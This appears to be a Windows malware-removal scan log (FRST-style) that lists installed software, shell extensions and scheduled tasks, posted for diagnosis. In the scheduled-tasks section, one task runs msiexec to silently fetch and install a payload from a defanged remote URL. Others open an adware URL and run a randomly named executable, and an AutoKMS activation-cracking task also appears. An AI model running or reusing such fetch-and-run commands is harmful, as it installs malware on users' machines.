Eines de correcció del Microsoft Office 2013: català (HKLM\...\{90150000-001F-0403-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Ferramentas de verificación de Microsoft Office 2013 - Galego (HKLM\...\{90150000-001F-0456-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Freemake Video Converter versión 4.1.9 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.9 - Ellora Assets Corporation)
FTL version 1.5.13 (HKLM-x32\...\{20E23A40-38E5-4DD6-B738-BC8097AE66B6}_is1) (Version: 1.5.13 - Subset Games)
HWiNFO64 Version 5.84 (HKLM\...\HWiNFO64_is1) (Version: 5.84 - Martin Malík - REALiX)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.1.209 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{9D0D2A8B-7E7B-4D88-8D50-24286ED6A5EB}) (Version: 12.5.5.5 - Apple Inc.)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
K-Lite Mega Codec Pack 13.0.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.0.0 - KLCP)
La Cosa (HKLM-x32\...\{632B286A-CD76-47A4-8C34-1AF49B08CEA3}) (Version:  - )
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LOST PLANET 2 (HKLM-x32\...\{43430808-081A-4C0D-B7CC-601000018301}) (Version: 1.0.0001.131 - CAPCOM CO., LTD.) Hidden
LOST PLANET 2 (HKLM-x32\...\{43430808-081A-4C0D-B7CC-601000018302}) (Version: 1.0.0001.131 - CAPCOM CO., LTD.) Hidden
Malwarebytes versión 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft .NET Framework 4.7.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft AppLocale (HKLM-x32\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{5DDC2234-4B37-45BC-AD33-41F1469B4D83}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom  (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Applications - ENU (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Applications - ENU) (Version:  - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft versión 1.9.0 (HKLM-x32\...\{64E20254-DB52-4EC0-97E4-93B7C7B2DEDA}_is1) (Version: 1.9.0 - Mojang)
Mozilla Firefox 62.0.3 (x64 es-ES) (HKLM\...\Mozilla Firefox 62.0.3 (x64 es-ES)) (Version: 62.0.3 - Mozilla)
MSI Afterburner 4.3.0 (HKLM-x32\...\Afterburner) (Version: 4.3.0 - MSI Co., LTD)
Nitro Pro 10 (HKLM\...\{1D2A0303-DFD2-4C15-B6AB-44DED532EC0E}) (Version: 10.5.8.44 - Nitro)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NVIDIA Controlador de 3D Vision 391.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.35 - NVIDIA Corporation)
NVIDIA Controlador de audio HD 1.3.36.6 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.36.6 - NVIDIA Corporation)
NVIDIA Controlador de gráficos 391.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.35 - NVIDIA Corporation)
NVIDIA Controlador de la controladora 3D Vision 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Software del sistema PhysX 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Oure (HKLM-x32\...\Oure_is1) (Version:  - )
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Panel de control de NVIDIA 391.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 391.35 - NVIDIA Corporation) Hidden
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
Prince of Persia The Two Thrones MULTi6 - ElAmigos versión 1.0 (HKLM-x32\...\{FCED5627-4507-4D53-A6D4-093E8B5D1A1B}_is1) (Version: 1.0 - Ubisoft)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.49.927.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (HKLM\...\{90150000-001F-0416-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
RPG MAKER VX Ace RTP (HKLM-x32\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Skullgirls 2nd Encore (HKLM-x32\...\Skullgirls 2nd Encore_is1) (Version:  - )
SolidWorks 2014 x64 Edition SP03 (HKLM\...\{4FFA60C4-9A8B-4C9E-8265-2241B266304C}) (Version: 22.130.56 - SolidWorks) Hidden
SolidWorks 2014 x64 Edition SP03 (HKLM-x32\...\SolidWorks Installation Manager 20140-40300-1100-100) (Version: 22.3.0.56 - SolidWorks Corporation)
SolidWorks 2014 x64 Spanish Resources (HKLM\...\{E548E17E-189D-4E04-B5F1-17749F86EA0C}) (Version: 22.130.56 - SolidWorks) Hidden
SolidWorks Composer 2014 SP03 x64 Edition (HKLM\...\{EB45AA0F-96A7-4583-9E6F-6CA4DCFE67CE}) (Version: 22.30.56 - Dassault Systemes SolidWorks) Hidden
SolidWorks eDrawings 2014 x64 Edition SP03 (HKLM\...\{63BFDA11-6475-45E3-93E9-7D2AA28AECD5}) (Version: 14.3.107 - Dassault Systèmes SolidWorks Corp) Hidden
SolidWorks Electrical 2014 SP03 x64 Edition (HKLM\...\{3F08399F-67CD-4950-AED0-64A9590FE626}) (Version: 22.30.56 - DS SolidWorks) Hidden
SolidWorks Explorer 2014 SP03 x64 Edition (HKLM\...\{0C10FAF1-35D5-416A-B7C1-4168ED9485FA}) (Version: 22.30.56 - SolidWorks Corporation) Hidden
SolidWorks Flow Simulation 2014 SP03 x64 Edition  (HKLM\...\{4DC5DE7E-E67D-4A2B-8E67-EB7B28045247}) (Version: 22.30.57 - SolidWorks Corporation) Hidden
SolidWorks Plastics 2014 SP03 x64 Edition (HKLM\...\{104E8BAF-2E2A-4467-A5C0-92ED92F26547}) (Version: 22.30.56 - SolidWorks Corporation) Hidden
SQL Server 2012 Common Files (HKLM\...\{1D411379-9CE0-4B13-A19B-72D3222DD620}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (HKLM\...\{202AAF1F-69AA-442A-B59F-6B54B1AD07C6}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{18B2A97C-92C3-4AC7-BE72-F823E0BC895B}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{84FBCA4A-D650-4B0D-8094-EC0671FA9B91}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{54FF8FAB-DE27-4187-82F1-EBAE6AEE869A}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{6603C2CE-3C54-4F1D-92F9-8390CD4CCCA8}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (HKLM\...\{BED1EA3D-592D-4305-9D1F-20F03726EFC1}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TuneUp Utilities 2014 (es-MX) (HKLM-x32\...\{460EA1C5-B71F-4DEA-99C1-A82016ADECD2}) (Version: 14.0.1000.353 - TuneUp Software) Hidden
TuneUp Utilities 2014 (HKLM-x32\...\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C}) (Version: 14.0.1000.353 - TuneUp Software) Hidden
TuneUp Utilities 2014 (HKLM-x32\...\TuneUp Utilities) (Version: 14.0.1000.353 - TuneUp Software)
Uninstall Tool (HKLM\...\Uninstall Tool_is1) (Version: 3.4 - CrystalIDEA Software, Inc.)
Virtual Audio Cable 4.10 (HKLM\...\Virtual Audio Cable 4.10) (Version:  - )
VirtualDJ 8 (HKLM-x32\...\{A8EB77B7-2A7B-46F8-BF9D-9EE1F95A9A2E}) (Version: 8.0.2523.0 - Atomix Productions)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.2 - VideoLAN)
Voobly (HKLM-x32\...\Voobly_is1) (Version: Voobly - Voobly)
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
WinDirStat 1.1.2 (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\WinDirStat) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
WinZip 20.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C24105}) (Version: 20.5.12118 - WinZip Computing, S.L. )
Wizard of Legend MULTi5 - ElAmigos versión 1.01 (HKLM-x32\...\{0149F67B-F3C1-4C81-8CFF-E8F7C42F6D8E}_is1) (Version: 1.01 - Contingent99)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-4162917515-3570797744-2880415204-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader64.dll ()
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2017-08-28] ()
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2016-03-08] (Piriform Ltd)
ContextMenuHandlers1: [NP8ShellExtension] -> {9C4B85B8-956C-49BF-9BA5-101384E562B2} => C:\Program Files\Nitro\Pro 10\NPShellExtension.dll [2016-03-03] (Nitro PDF)
ContextMenuHandlers1: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\TuneUp Utilities 2014\SDShelEx-x64.dll [2015-06-25] (TuneUp Software)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files\WinZip\wzshls64.dll [2016-04-29] (WinZip Computing, S.L.)
ContextMenuHandlers1-x32: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll [2014-10-24] ()
ContextMenuHandlers2-x32: [AlcoholShellEx] -> {32020A01-506E-484D-A2A8-BE3CF17601C3} => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxShlex.dll [2010-03-25] (Alcohol Soft Development Team)
ContextMenuHandlers2-x32: [AlcoholShellEx64] -> {AF67B665-D752-424E-9A03-C7C218F2844F} => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxShlEx64.dll [2010-03-25] (Alcohol Soft Development Team)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers4: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-03-27] (Piriform Ltd)
ContextMenuHandlers4: [TuneUp Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => C:\Program Files (x86)\TuneUp Utilities 2014\DseShExt-x64.dll [2015-06-25] (TuneUp Software)
ContextMenuHandlers4: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\TuneUp Utilities 2014\SDShelEx-x64.dll [2015-06-25] (TuneUp Software)
ContextMenuHandlers4: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files\WinZip\wzshls64.dll [2016-04-29] (WinZip Computing, S.L.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-03-23] (NVIDIA Corporation)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2016-03-08] (Piriform Ltd)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-03-27] (Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files\WinZip\wzshls64.dll [2016-04-29] (WinZip Computing, S.L.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0CF50F8A-B58B-4C0C-9794-32311F91E0C4} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2018-09-19] (Piriform Ltd)
Task: {1E580F1A-58B2-49B5-B06D-322A4633A861} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig
Task: {1E580F1A-58B2-49B5-B06D-322A4633A861} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)
Task: {37E63409-96F0-4A3B-A957-6783FE6AC65D} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2018-09-19] (Piriform Ltd)
Task: {42EE44E8-7AD8-4AE9-9125-A26F6BB31C23} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2016-02-22] ()
Task: {4E8FC39F-C188-452B-A1C4-AD050363C37E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation)
Task: {5074E7C9-8B67-498E-B5FA-3D6C2BCC441E} - System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6} => "msiexec.exe" -i hxxp://inthemel.info/zbbqikhhxcuh.ciy -q
Task: {54C284F1-9B86-429C-9B70-433F38B5D831} - \SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc -> No File <==== ATTENTION
Task: {58615BBD-D522-498D-B146-F04419B5A1D6} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\TuneUp Utilities 2014\OneClick.exe [2015-06-25] (TuneUp Software)
Task: {5AE0A303-B6A5-4780-9AEC-6EDB68B7E92B} - System32\Tasks\WinZipBackGroundToolsTask => C:\Program Files\WinZip\WzBGTools.exe [2016-04-29] (WinZip Computing, S.L.)
Task: {633C93F3-00CF-49CD-8B97-77B0B66E887F} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfigAndContent
Task: {633C93F3-00CF-49CD-8B97-77B0B66E887F} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)
Task: {6D5D7057-8FEF-4207-A656-9C37FCB41600} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe [2018-09-14] (AVAST Software)
Task: {8026CFAA-26D6-42E9-90BC-E1137B09FC08} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2017-07-21] (Oracle Corporation)
Task: {95570C4B-C3EE-42B3-8B08-B5D3402F3123} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [2018-09-24] (AVG Technologies CZ, s.r.o.)
Task: {A1DE8A18-7CB1-465F-AC85-51B0AE21C246} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_Plugin.exe [2018-10-09] (Adobe Systems Incorporated)
Task: {A87F6214-B479-4A28-BD0C-028D27A1F05C} - System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73} => "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" hxxp://jooring.net/cl/?guid=y59kcxeaks8jrwj72y9g2sxsddnfs11g&prid=1&pid=4_1324_0
Task: {A8C70671-9C51-48EA-B8AA-9AF19B279CE3} - System32\Tasks\update-S-1-5-21-4162917515-3570797744-2880415204-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {A9392CAF-D155-4440-8DC2-D6BBF2D1A6E5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig
Task: {A9392CAF-D155-4440-8DC2-D6BBF2D1A6E5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(2): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshContent
Task: {A9392CAF-D155-4440-8DC2-D6BBF2D1A6E5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(3): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)
Task: {C10402EE-5A05-4161-AD27-A2192D3562CC} - System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B} => C:\Program Files (x86)\Common Files\aOTSAwA.exe [2009-07-13] (Microsoft Corporation)
Task: {CF4B4749-FF70-43AC-8383-6FB9944D036B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-10-09] (Adobe Systems Incorporated)
Task: {D1788CFB-4E95-475D-A654-A756FB32447C} - System32\Tasks\MSIAfterburner => C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe [2016-10-24] ()
Task: {EED0FE4D-F72B-4D5D-BC8A-496A53AB62E6} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {EF7D4116-8D62-4F57-9298-34E940612BE7} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
